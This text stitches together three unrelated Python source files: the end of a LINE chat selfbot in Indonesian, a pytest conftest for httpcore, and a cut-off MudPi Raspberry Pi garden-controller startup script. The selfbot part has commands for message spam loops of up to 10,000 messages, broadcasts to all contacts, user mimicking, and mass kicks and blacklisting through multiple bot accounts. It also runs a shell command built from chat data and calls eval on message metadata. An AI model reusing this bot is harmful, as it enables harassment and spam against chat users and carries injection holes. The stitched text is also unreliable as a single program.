cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#-------------------Fungsi spam start--------------------------
elif "Spam change:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#-------------------Fungsi spam finish----------------------------
#-----------------------------------------------
#-----------------------------------------------
elif 'apakah' in msg.text.lower():
if msg.from_ in admin:
tanya = msg.text.lower().replace("apakah","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#================================================
#===============================================
#=================================================
elif "Spamg " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spamg "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Steal mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Steal mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#========================================
elif msg.text in ["Join all"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
info = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kt.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "All_Kickers_Ok!"
G.preventJoinByTicket(G)
cl.updateGroup(G)
#=====================================================================================
elif msg.text in ["Bye allgroups"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ks.leaveGroup(i)
kt.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"bye-bye")
else:
ki.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Bye all"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
kt.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Center @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
cl.sendMessage(msg.to,"bye-bye")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Nk "]:
if msg.from_ in admin:
mk0 = msg.text.replace("Nk ","")
mk1 = mk0.lstrip()
mk2 = mk1.replace("@","")
mk3 = mk2.rstrip()
_name = mk3
gs = ki.getGroup(msg.to)
targets = []
for h in gs.members:
if _name in h.displayName:
targets.append(h.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
if msg.from_ not in target:
ki.kickoutFromGroup(msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#-------------------------------------------------
elif "/say-jp " in msg.text:
say = msg.text.replace("/say-jp ","")
lang = 'jp'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
#------------------------------------------------
elif "/say-en " in msg.text:
say = msg.text.replace("/say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
#-----------------------------------------------
elif "/say " in msg.text:
psn = msg.text.replace("/say ","")
tts = gTTS(psn, lang='id', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
#-----------------------------------------------
elif "Siapa " in msg.text:
tanya = msg.text.replace("Siapa ","")
jawab = ("Dia yg kebanyakan micin"," Dia gila")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='en')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
#==========================================
elif "Dosa @" in msg.text:
tanya = msg.text.replace("Dosa @","")
jawab = ("60%","70%","80%","90%","100%","Tak terhingga")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='en')
tts.save('tts.mp3')
cl.sendText(msg.to,"Dosanya adalah cek voie ini")
cl.sendAudio(msg.to,'tts.mp3')
#==========================================
#==========================================
elif "/ " in msg.text.lower():
txt = msg.text.replace("kedapkedip ", "")
t1 = "\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xa0\x81\xf4\x80\xa0\x81\xf4\x80\xa0\x81"
t2 = "\xf4\x80\x82\xb3\xf4\x8f\xbf\xbf"
cl.sendText(msg.to, t1 + txt + t2)
#-------Cek sider biar mirip kek siri-----------------------------
elif "Setlastpoint" in msg.text:
subprocess.Popen("echo '' > dataSeen/"+msg.to+".txt", shell=True, stdout=subprocess.PIPE)
#cl.sendText(msg.to, "Checkpoint checked!")
cl.sendText(msg.to, "Set the lastseens' point(`・ω・´)\n\n" + datetime.now().strftime('%H:%M:%S'))
print "Setlastpoint"
#--------------------------------------------
elif "Viewlastseen" in msg.text:
lurkGroup = ""
dataResult, timeSeen, contacts, userList, timelist, recheckData = [], [], [], [], [], []
with open('dataSeen/'+msg.to+'.txt','r') as rr:
contactArr = rr.readlines()
for v in xrange(len(contactArr) -1,0,-1):
num = re.sub(r'\n', "", contactArr[v])
contacts.append(num)
pass
contacts = list(set(contacts))
for z in range(len(contacts)):
arg = contacts[z].split('|')
userList.append(arg[0])
timelist.append(arg[1])
uL = list(set(userList))
for ll in range(len(uL)):
try:
getIndexUser = userList.index(uL[ll])
timeSeen.append(time.strftime("%d日 %H:%M:%S", time.localtime(int(timelist[getIndexUser]) / 1000)))
recheckData.append(userList[getIndexUser])
except IndexError:
conName.append('nones')
pass
contactId = cl.getContacts(recheckData)
for v in range(len(recheckData)):
dataResult.append(contactId[v].displayName + ' ('+timeSeen[v]+')')
pass
if len(dataResult) > 0:
grp = '\n• '.join(str(f) for f in dataResult)
total = '\nThese %iuesrs have seen at the lastseen\npoint(`・ω・´)\n\n%s' % (len(dataResult), datetime.now().strftime('%H:%M:%S') )
cl.sendText(msg.to, "• %s %s" % (grp, total))
else:
cl.sendText(msg.to, "Sider ga bisa di read cek setpoint dulu bego tinggal ketik\nSetlastpoint\nkalo mau liat sider ketik\nViewlastseen")
print "Viewlastseen"
#==========================================
elif msg.text in ["Purge"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"group purge")
return
for jj in matched_list:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-----------------------------------------------------------
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear banlist"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"succes clear all banlist")
elif msg.text in ["Banned"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"blacklist user list")
mc = "[⎈]Blacklist User[⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
#=============================================
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("Ban repeat " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned ")
except:
pass
#============================================
#elif msg.text in ["Clear"]:
#if msg.toType == 2:
#group = cl.getGroup(msg.to)
#gMembMids = [contact.mid for contact in group.invitee]
#for _mid in gMembMids:
#random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
#cl.sendText(msg.to,"Clear boss!!!")
elif msg.text.lower() in ["Assalammualaikum","Tag","mention"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = ""
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
kt.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
cl.sendText
except:
pass
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ks.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kt.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ki.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kk.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kc.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ks.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kt.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
conftest.py | import contextlib
import os
import threading
import time
import typing
import pytest
import uvicorn
from httpcore._types import URL
from .utils import Server, http_proxy_server
SERVER_HOST = "example.org"
HTTPS_SERVER_URL = "https://example.org"
@pytest.fixture(scope="session")
def proxy_server() -> typing.Iterator[URL]:
proxy_host = "127.0.0.1"
proxy_port = 8080
with http_proxy_server(proxy_host, proxy_port) as proxy_url:
yield proxy_url
class UvicornServer(uvicorn.Server):
def install_signal_handlers(self) -> None:
pass
@contextlib.contextmanager
def serve_in_thread(self) -> typing.Iterator[None]:
thread = threading.Thread(target=self.run)
thread.start()
try:
while not self.started:
time.sleep(1e-3)
yield
finally:
self.should_exit = True
thread.join()
async def app(scope: dict, receive: typing.Callable, send: typing.Callable) -> None:
assert scope["type"] == "http"
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
@pytest.fixture(scope="session")
def uds_server() -> typing.Iterator[UvicornServer]:
uds = "test_server.sock"
config = uvicorn.Config(app=app, lifespan="off", loop="asyncio", uds=uds)
server = UvicornServer(config=config)
try:
with server.serve_in_thread():
yield server
finally:
os.remove(uds)
@pytest.fixture(scope="session")
def server() -> Server:
return Server(SERVER_HOST, port=80)
@pytest.fixture(scope="session")
def https_server() -> Server:
return Server(SERVER_HOST, port=443)
|
mudpi.py | import RPi.GPIO as GPIO
import threading
import datetime
import socket
import redis
import time
import json
import sys
sys.path.append('..')
from action import Action
from config_load import loadConfigJson
from server.mudpi_server import MudpiServer
from workers.pi.lcd_worker import LcdWorker
from workers.pi.i2c_worker import PiI2CWorker
from workers.pi.relay_worker import RelayWorker
from workers.pi.camera_worker import CameraWorker
from workers.pi.sensor_worker import PiSensorWorker
from workers.pi.control_worker import PiControlWorker
from workers.trigger_worker import TriggerWorker
from workers.sequence_worker import SequenceWorker
try:
from workers.arduino.arduino_worker import ArduinoWorker
NANPY_ENABLED = True
except ImportError:
NANPY_ENABLED = False
try:
from workers.adc_worker import ADCMCP3008Worker
MCP_ENABLED = True
except ImportError:
MCP_ENABLED = False
from logger.Logger import Logger, LOG_LEVEL
import variables
##############################
# MudPi Core
# Author: Eric Davisson (@theDavisson) [EricDavisson.com]
# https://mudpi.app
# MudPi Core is a python library to gather sensor readings, control components,
# and manage devices using a Raspberry Pi on an event based system using redis.
#
CONFIGS = {}
PROGRAM_RUNNING = True
threads = []
actions = {}
sequences = {}
relays = []
relayEvents = {}
relay_index = 0
sequenceEvents = {}
sequence_index = 0
workers = []
nodes = []
print(chr(27) + "[2J")
print('Loading MudPi Configs...\r', end="", flush=True)
CONFIGS = loadConfigJson()
# Singleton redis to prevent connection conflicts
try:
r = redis.Redis(host=CONFIGS['redis'].get('host', '127.0.0.1'), port=int(CONFIGS['redis'].get('port', 6379)))
except KeyError:
r = redis.Redis(host='127.0.0.1', port=6379)
# Waiting for redis and services to be running
time.sleep(5)
print('Loading MudPi Configs...\t\033[1;32m Complete\033[0;0m')
print(chr(27) + "[2J")
# Print a display logo for startup
print("\033[1;32m")
print(' __ __ _ _____ _ ')
print('| \/ | | | __ (_)')
print('| \ / |_ _ __| | |__) | ')
print('| |\/| | | | |/ _` | ___/ | ')
print('| | | | |_| | (_| | | | | ')
print('|_| |_|\__,_|\__,_|_| |_| ')
print('_________________________________________________')
print('')
print('Eric Davisson @theDavisson')
print('https://mudpi.app')
print('Version: ', CONFIGS.get('version', '0.9.1'))
print('\033[0;0m')
if CONFIGS['debug'] is True:
print('\033[1;33mDEBUG MODE ENABLED\033[0;0m')
print("Loaded Config\n--------------------")
for index, config in CONFIGS.items():
if config != '':
print('%s: %s' % (index, config))
time.sleep(10)
try:
print('Initializing Logger \r', end="", flush=True)
Logger.logger = Logger(CONFIGS)
time.sleep(0.05)
Logger.log(LOG_LEVEL["info"], 'Initializing Logger...\t\t\t\033[1;32m Complete\033[0;0m')
Logger.log_to_file(LOG_LEVEL["debug"], "Dumping the config file: ")
for index, config in CONFIGS.items():
Logger.log_to_file(LOG_LEVEL["debug"], '%s: %s' % (index, config))
Logger.log_to_file(LOG_LEVEL["debug"], "End of config file dump!\n")
except Exception as e:
Logger.log(LOG_LEVEL["info"], 'Initializing Logger...\t\t\t\033[1;31m Disabled\033[0;0m')
try:
print('Initializing Garden Control \r', end="", flush=True)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.cleanup()
# Pause for GPIO to finish
time.sleep(0.1)
Logger.log(LOG_LEVEL["info"], 'Initializing Garden Control...\t\t\033[1;32m Complete\033[0;0m')
print('Preparing Threads for Workers\r', end="", flush=True)
new_messages_waiting = threading.Event() # Event to signal LCD to pull new messages
main_thread_running = threading.Event() # Event to signal workers to close
system_ready = threading.Event() # Event to tell workers to begin working
camera_available = threading.Event() # Event to signal if camera can be used
lcd_available = threading.Event() # Event to signal if lcd displays can be used
main_thread_running.set() # Main event to tell workers to run/shutdown
time.sleep(0.1)
Logger.log(LOG_LEVEL["info"], 'Preparing Threads for Workers...\t\033[1;32m Complete\033[0;0m')
# Worker for Camera
try:
if len(CONFIGS["camera"]) > 0:
CONFIGS["camera"]["redis"] = r
c = CameraWorker(CONFIGS['camera'], main_thread_running, system_ready, camera_available)
Logger.log(LOG_LEVEL["info"], 'Camera...\t\t\t\033[1;32m Initializing\033[0;0m')
workers.append(c)
camera_available.set()
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Pi Camera...\t\t\t\t\033[1;31m Disabled\033[0;0m')
# Workers for pi (Sensors, Controls, Relays, I2C)
try:
if len(CONFIGS["workers"]) > 0:
for worker in CONFIGS['workers']:
# Create worker for worker
worker["redis"] = r
if worker['type'] == "sensor":
pw = PiSensorWorker(worker, main_thread_running, system_ready)
Logger.log(LOG_LEVEL["info"], 'Sensors...\t\t\t\t\033[1;32m Initializing\033[0;0m')
elif worker['type'] == "control":
pw = PiControlWorker(worker, main_thread_running, system_ready)
Logger.log(LOG_LEVEL["info"], 'Controls...\t\t\t\t\033[1;32m Initializing\033[0;0m')
elif worker['type'] == "i2c":
pw = PiI2CWorker(worker, main_thread_running, system_ready)
Logger.log(LOG_LEVEL["info"], 'I2C Comms...\t\t\t\t\033[1;32m Initializing\033[0;0m')
elif worker['type'] == "display":
for display in worker['displays']:
display["redis"] = r
pw = LcdWorker(display, main_thread_running, system_ready, lcd_available)
lcd_available.set()
Logger.log(LOG_LEVEL["info"], 'LCD Displays...\t\t\t\t\033[1;32m Initializing\033[0;0m')
elif worker['type'] == "relay":
# Add Relay Worker Here for Better Config Control
Logger.log(LOG_LEVEL["info"], 'Relay...\t\t\t\033[1;32m Initializing\033[0;0m')
else:
Logger.log(LOG_LEVEL["warning"], "Exception raised due to unknown Worker Type: {0}".format(worker['type']))
raise Exception("Unknown Worker Type: " + worker['type'])
workers.append(pw)
except KeyError as e:
Logger.log(LOG_LEVEL["info"], 'Pi Workers...\t\t\t\t\033[1;31m Disabled\033[0;0m')
print(e)
# Worker for relays attached to pi
try:
if len(CONFIGS["relays"]) > 0:
for relay in CONFIGS['relays']:
relay["redis"] = r
relayState = {
"available": threading.Event(), # Event to allow relay to activate
"active": threading.Event() # Event to signal relay to open/close
}
relayEvents[relay.get("key", relay_index)] = relayState
rw = RelayWorker(relay, main_thread_running, system_ready, relayState['available'], relayState['active'])
workers.append(rw)
# Make the relays available, this event is toggled off elsewhere if we need to disable relays
relayState['available'].set()
relay_index +=1
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Relays Workers...\t\t\033[1;31m Disabled\033[0;0m')
# Load in Actions
try:
if len(CONFIGS["actions"]) > 0:
for action in CONFIGS["actions"]:
action["redis"] = r
a = Action(action)
a.init_action()
actions[a.key] = a
Logger.log(LOG_LEVEL["info"], '{0} Actions...\t\t\t\t\033[1;32m Initializing\033[0;0m'.format(len(CONFIGS['actions'])))
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Actions...\t\t\t\033[1;31m Disabled\033[0;0m')
# Worker for Sequences
try:
if len(CONFIGS["sequences"]) > 0:
for sequence in CONFIGS["sequences"]:
sequence["redis"] = r
sequenceState = {
"available": threading.Event(), # Event to allow sequence to activate
"active": threading.Event() # Event to signal sequence to open/close
}
sequenceEvents[sequence.get("key", sequence_index)] = sequenceState
s = SequenceWorker(sequence, main_thread_running, system_ready, sequenceState['available'], sequenceState['active'], actions)
workers.append(s)
sequences[s.key] = s
sequenceState['available'].set()
sequence_index +=1
Logger.log(LOG_LEVEL["info"], '{0} Sequences...\t\t\t\t\033[1;32m Initializing\033[0;0m'.format(len(CONFIGS["sequences"])))
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Sequences...\t\t\t\t\033[1;31m Disabled\033[0;0m')
# Worker for Triggers
try:
if len(CONFIGS["triggers"]) > 0:
for trigger in CONFIGS["triggers"]:
trigger["redis"] = r
t = TriggerWorker(CONFIGS['triggers'], main_thread_running, system_ready, actions, sequences)
Logger.log(LOG_LEVEL["info"], 'Triggers...\t\t\t\t\033[1;32m Initializing\033[0;0m')
workers.append(t)
except KeyError:
Logger.log(LOG_LEVEL["info"], 'Triggers...\t\t\t\t\033[1;31m Disabled\033[0;0m')
# Worker for nodes attached to pi via serial or wifi[esp8266, esp32]
# Supported nodes: arduinos, esp8266, ADC-MCP3xxx, probably others (esp32 with custom nanpy fork)
try:
if len(CONFIGS["nodes"]) > 0:
for node in CONFIGS['nodes']:
node["redis"] = r
if node['type'] == "arduino":
if NANPY_ENABLED:
Logger.log(LOG_LEVEL["info"], 'MudPi Arduino Workers...\t\t\033[1;32m Initializing\033[0;0m')
t = ArduinoWorker(node, main_thread_running, system_ready)
else:
Logger.log(LOG_LEVEL["error"], 'Error Loading Nanpy library. Did you pip3 install -r requirements.txt?')
elif node['type'] == "ADC-MCP3008":
if MCP_ENABLED:
Logger.log(LOG_LEVEL["info"], 'MudPi ADC Workers...\t\t\033[1;32m Initializing\033[0;0m')
t = ADCMCP3008Worker(node, main_thread_running, system_ready)
else:
Logger.log(LOG_LEVEL["error"], 'Error Loading MCP3xxx library. Did you pip3 install -r requirements.txt;?')
else:
Logger.log(LOG_LEVEL["warning"], "Exception raised due to unknown Node Type: {0}".format(node['type']))
raise Exception("Unknown Node Type: " + node['type'])
nodes.append(t)
except KeyError as e:
